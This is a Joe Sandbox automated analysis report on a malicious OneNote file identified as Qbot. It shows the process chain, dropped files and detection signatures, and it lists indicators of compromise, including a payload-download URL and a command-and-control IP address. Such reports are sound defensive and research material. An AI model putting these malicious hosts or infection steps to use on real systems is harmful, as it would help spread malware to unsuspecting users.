          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 800757 Sample: Note.one Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 81 www.broadcom.com 2->81 83 tassoinmobiliaria.com 2->83 85 2 other IPs or domains 2->85 91 Malicious sample detected (through community Yara rule) 2->91 93 Yara detected Qbot 2->93 95 Sigma detected: Execute DLL with spoofed extension 2->95 97 2 other signatures 2->97 12 cmd.exe 2 2->12         started        16 ONENOTE.EXE 91 501 2->16         started        18 ONENOTEM.EXE 2->18         started        20 msiexec.exe 2->20         started        signatures3 process4 file5 77 C:\ProgramData\in.cmd, ASCII 12->77 dropped 117 Suspicious powershell command line found 12->117 22 cmd.exe 1 12->22         started        24 powershell.exe 7 12->24         started        27 conhost.exe 12->27         started        29 ONENOTEM.EXE 3 16->29         started        signatures6 process7 signatures8 31 rundll32.exe 22->31         started        33 powershell.exe 14 16 22->33         started        37 conhost.exe 22->37         started        99 Powershell drops PE file 24->99 process9 dnsIp10 39 rundll32.exe 1 31->39         started        79 tassoinmobiliaria.com 148.163.69.171, 443, 49827 IOFLOODUS United States 33->79 73 C:\ProgramData\putty.jpg, PE32 33->73 dropped file11 process12 file13 75 C:\Users\user\AppData\Local\...\6153a066.dll, PE32 39->75 dropped 101 DLL reload attack detected 39->101 103 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 39->103 105 Writes to foreign memory regions 39->105 107 3 other signatures 39->107 43 backgroundTaskHost.exe 8 16 39->43         started        signatures14 process15 dnsIp16 87 87.149.176.97, 443, 49838, 49840 DTAGInternetserviceprovideroperationsDE Germany 43->87 89 broadcom.com 50.112.202.115, 443, 49836 AMAZON-02US United States 43->89 109 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 43->109 111 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 43->111 113 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 43->113 115 8 other signatures 43->115 47 net.exe 1 43->47         started        49 net.exe 43->49         started        51 ROUTE.EXE 1 43->51         started        53 6 other processes 43->53 signatures17 process18 process19 55 conhost.exe 47->55         started        57 net1.exe 1 47->57         started        59 conhost.exe 49->59         started        61 net1.exe 49->61         started        63 conhost.exe 51->63         started        65 conhost.exe 53->65         started        67 conhost.exe 53->67         started        69 conhost.exe 53->69         started        71 3 other processes 53->71

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          Note.one0%VirustotalBrowse
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\6153a066.dll2%ReversingLabs
          No Antivirus matches
          SourceDetectionScannerLabelLink
          tassoinmobiliaria.com1%VirustotalBrowse
          SourceDetectionScannerLabelLink
          https://cdn.entity.0%Avira URL Cloudsafe
          https://87.149.176.97/t50%Avira URL Cloudsafe
          https://tassoinmobiliaria.com/56G0/01.gif0%Avira URL Cloudsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%Avira URL Cloudsafe
          https://powerlift.acompli.net0%Avira URL Cloudsafe
          https://rpsticket.partnerservices.getmicrosoftkey.com0%VirustotalBrowse
          https://powerlift.acompli.net0%VirustotalBrowse
          https://cortana.ai0%Avira URL Cloudsafe
          https://api.aadrm.com/0%Avira URL Cloudsafe
          https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h0%Avira URL Cloudsafe
          https://res.getmicrosoftkey.com/api/redemptionevents0%Avira URL Cloudsafe
          https://powerlift-frontdesk.acompli.net0%Avira URL Cloudsafe
          https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
          https://api.scheduler.0%Avira URL Cloudsafe
          https://my.microsoftpersonalcontent.com0%Avira URL Cloudsafe
          https://store.office.cn/addinstemplate0%Avira URL Cloudsafe
          https://api.aadrm.com0%Avira URL Cloudsafe
          https://dev0-api.acompli.net/autodetect0%Avira URL Cloudsafe
          https://www.odwebp.svc.ms0%Avira URL Cloudsafe
          https://api.addins.store.officeppe.com/addinstemplate0%Avira URL Cloudsafe
          https://dataservice.o365filtering.com/0%Avira URL Cloudsafe
          https://officesetup.getmicrosoftkey.com0%Avira URL Cloudsafe
          https://prod-global-autodetect.acompli.net/autodetect0%Avira URL Cloudsafe
          https://d.docs.live.net0%Avira URL Cloudsafe
          https://ncus.contentsync.0%Avira URL Cloudsafe
          https://apis.live.net/v5.0/0%Avira URL Cloudsafe
          https://make.powerautomate.com0%Avira URL Cloudsafe
          https://wus2.contentsync.0%Avira URL Cloudsafe
          https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          tassoinmobiliaria.com
          148.163.69.171
          truefalseunknown
          broadcom.com
          50.112.202.115
          truefalse
            high
            www.broadcom.com
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://87.149.176.97/t5false
              • Avira URL Cloud: safe
              unknown
              https://tassoinmobiliaria.com/56G0/01.giffalse
              • Avira URL Cloud: safe
              unknown
              https://broadcom.com/false
                high
                NameSourceMaliciousAntivirus DetectionReputation
                https://api.diagnosticssdf.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                  high
                  https://login.microsoftonline.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                    high
                    https://shell.suite.office.com:144386EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                      high
                      https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                        high
                        https://autodiscover-s.outlook.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                          high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                            high
                            https://cdn.entity.86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.addins.omex.office.net/appinfo/query86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                              high
                              https://clients.config.office.net/user/v1.0/tenantassociationkey86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                high
                                https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                  high
                                  https://powerlift.acompli.net86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://rpsticket.partnerservices.getmicrosoftkey.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://lookup.onenote.com/lookup/geolocation/v186EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                    high
                                    https://cortana.ai86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                      high
                                      https://api.powerbi.com/v1.0/myorg/imports86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                        high
                                        https://cloudfiles.onenote.com/upload.aspx86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                          high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                            high
                                            https://entitlement.diagnosticssdf.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                              high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                high
                                                https://api.aadrm.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                  high
                                                  https://api.microsoftstream.com/api/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                    high
                                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                      high
                                                      https://cr.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                        high
                                                        https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                        • Avira URL Cloud: safe
                                                        low
                                                        https://portal.office.com/account/?ref=ClientMeControl86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.5649681111.000002AA513E3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://graph.ppe.windows.net86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                              high
                                                              https://res.getmicrosoftkey.com/api/redemptionevents86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://powerlift-frontdesk.acompli.net86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://tasks.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                high
                                                                https://jp.broadcom.comFGR8SNK3.htm.14.drfalse
                                                                  high
                                                                  https://officeci.azurewebsites.net/api/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/work86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                    high
                                                                    https://api.scheduler.86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://my.microsoftpersonalcontent.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://store.office.cn/addinstemplate86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://api.aadrm.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                      high
                                                                      https://globaldisco.crm.dynamics.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                        high
                                                                        https://messaging.engagement.office.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                          high
                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                            high
                                                                            https://dev0-api.acompli.net/autodetect86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.odwebp.svc.ms86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://api.diagnosticssdf.office.com/v2/feedback86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                              high
                                                                              https://api.powerbi.com/v1.0/myorg/groups86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                high
                                                                                https://web.microsoftstream.com/video/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                  high
                                                                                  https://api.addins.store.officeppe.com/addinstemplate86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://graph.windows.net86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                    high
                                                                                    https://dataservice.o365filtering.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://officesetup.getmicrosoftkey.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://analysis.windows.net/powerbi/api86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                      high
                                                                                      https://prod-global-autodetect.acompli.net/autodetect86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://outlook.office365.com/autodiscover/autodiscover.json86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                        high
                                                                                        https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                          high
                                                                                          https://consent.config.office.com/consentcheckin/v1.0/consents86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                            high
                                                                                            https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                              high
                                                                                              https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                high
                                                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                  high
                                                                                                  https://d.docs.live.net86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://ncus.contentsync.86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                    high
                                                                                                    https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                      high
                                                                                                      http://weather.service.msn.com/data.aspx86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                        high
                                                                                                        https://apis.live.net/v5.0/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                          high
                                                                                                          https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                            high
                                                                                                            https://messaging.lifecycle.office.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                              high
                                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                high
                                                                                                                https://cdn.cookielaw.org/scripttemplates/otSDKStub.jsFGR8SNK3.htm.14.drfalse
                                                                                                                  high
                                                                                                                  https://pushchannel.1drv.ms86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office365.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                        high
                                                                                                                        https://login.windows.netApp_1675799305235524000_F240886F-595A-4B76-A1BE-CF9D49A0F922.log.1.drfalse
                                                                                                                          high
                                                                                                                          https://wus2.contentsync.86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://incidents.diagnostics.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                            high
                                                                                                                            https://clients.config.office.net/user/v1.0/ios86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                              high
                                                                                                                              https://make.powerautomate.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://insertmedia.bing.office.net/odc/insertmedia86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                high
                                                                                                                                https://o365auditrealtimeingestion.manage.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://outlook.office365.com/api/v1.0/me/Activities86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://api.office.net86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://incidents.diagnosticssdf.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://asgsmsproxyapi.azurewebsites.net/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/android/policies86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://aka.ms/pscore6powershell.exe, 00000008.00000002.5649681111.000002AA513A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://entitlement.diagnostics.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://substrate.office.com/search/api/v2/init86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://outlook.office.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://storage.live.com/clientlogs/uploadlocation86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://outlook.office365.com/86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://webshell.suite.office.com86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://substrate.office.com/search/api/v1/SearchHistory86EA0135-154D-489F-87C7-839AC3EE6B84.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              87.149.176.97
                                                                                                                                                              unknownGermany
                                                                                                                                                              3320DTAGInternetserviceprovideroperationsDEfalse
                                                                                                                                                              148.163.69.171
                                                                                                                                                              tassoinmobiliaria.comUnited States
                                                                                                                                                              53755IOFLOODUSfalse
                                                                                                                                                              50.112.202.115
                                                                                                                                                              broadcom.comUnited States
                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                              Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                                              Analysis ID:800757
                                                                                                                                                              Start date and time:2023-02-07 19:46:29 +01:00
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 12m 15s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                              Run name:Potential for more IOCs and behavior
                                                                                                                                                              Number of analysed new started processes analysed:40
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample file name:Note.one
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.spre.troj.spyw.expl.evad.winONE@51/729@3/3
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 15% (good quality ratio 10.4%)
                                                                                                                                                              • Quality average: 59.5%
                                                                                                                                                              • Quality standard deviation: 42.9%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 99%
                                                                                                                                                              • Number of executed functions: 31
                                                                                                                                                              • Number of non-executed functions: 44
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .one
                                                                                                                                                              • Override analysis time to 240s for rundll32
                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, backgroundTaskHost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.109.76.141, 52.109.8.44, 52.113.194.132, 51.11.192.49, 104.18.32.150, 172.64.155.106
                                                                                                                                                              • Excluded domains from analysis (whitelisted): ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, tile-service.weather.microsoft.com, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, wdcpalt.microsoft.com, login.live.com, s-0005.s-msedge.net, config.officeapps.live.com, onedscolprdfrc07.francecentral.cloudapp.azure.com, officeclient.microsoft.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, www.broadcom.com.cdn.cloudflare.net
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              19:48:29AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk
                                                                                                                                                              19:48:31API Interceptor24x Sleep call for process: powershell.exe modified
                                                                                                                                                              19:48:43API Interceptor9x Sleep call for process: backgroundTaskHost.exe modified
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              148.163.69.171item.oneGet hashmaliciousBrowse
                                                                                                                                                                50.112.202.115hieroglyphs.dat.dllGet hashmaliciousBrowse
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  DTAGInternetserviceprovideroperationsDEBg3roWYlzp.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 87.180.181.217
                                                                                                                                                                  deWmHJb3Gy.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 217.89.2.43
                                                                                                                                                                  sDVett3bL4.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 79.242.247.96
                                                                                                                                                                  MAxTTaxyYJ.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 93.209.43.182
                                                                                                                                                                  uHJTidEkEo.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 2.170.16.95
                                                                                                                                                                  4iLDIlbK8X.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 91.54.23.71
                                                                                                                                                                  Mfhfd5S1Q2.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 84.138.220.120
                                                                                                                                                                  v3QtIHGMVN.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 84.136.121.97
                                                                                                                                                                  WS3MrLazaO.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 91.21.93.120
                                                                                                                                                                  PUyQqkDzE4.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 2.160.45.151
                                                                                                                                                                  vrJT5ZxIeO.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 91.0.244.76
                                                                                                                                                                  e5A3ahhY01.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 79.231.14.209
                                                                                                                                                                  vOiDcQpLqX.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 31.253.120.255
                                                                                                                                                                  fWikJEXL2p.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 79.234.82.226
                                                                                                                                                                  8fshmaf8Bf.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 91.30.19.91
                                                                                                                                                                  v859oajfVH.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 31.241.13.33
                                                                                                                                                                  BLBq6xYqWy.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 37.92.129.138
                                                                                                                                                                  x7fAEpfwHh.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 84.157.216.77
                                                                                                                                                                  muTtJjYqFV.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 193.158.238.193
                                                                                                                                                                  pVHowVapO3.elfGet hashmaliciousBrowse
                                                                                                                                                                  • 2.170.41.37
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  3b5074b1b5d032e5620f69f9f700ff0eDHL Original Documents.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  va1Nnhv2qX.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  hesaphareketi-01,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  12220173387_20230207_13363111_Hesap0zeti.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  Fedex_Shipping_Notification_606350692146_Delivery.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  FedEx Shipment Documents.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  https://deslizaj.tk/2022%20Tax_document_file_dropbox.zipGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  Document.oneGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  FedEx Shipment Documents.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  DHL Original Document.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  DHL ORIGINAL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  DHL Receipt.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  DHL 1 x 20' LY 0736449574 Shipment 0106245448.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  EMIR....vbsGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  transferencia........vbeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  e-dekont-20230206.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  Roqwnrsun.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  e-dekont-20230207.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  notes.oneGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  0x000600000001ace8-206.exeGet hashmaliciousBrowse
                                                                                                                                                                  • 148.163.69.171
                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\6153a066.dllDocument.oneGet hashmaliciousBrowse
                                                                                                                                                                    notes.oneGet hashmaliciousBrowse
                                                                                                                                                                      qopceyu.dllGet hashmaliciousBrowse
                                                                                                                                                                        file.exeGet hashmaliciousBrowse
                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                            06mNIWJoVz.exeGet hashmaliciousBrowse
                                                                                                                                                                              5W8kRNoAdB.exeGet hashmaliciousBrowse
                                                                                                                                                                                file.exeGet hashmaliciousBrowse
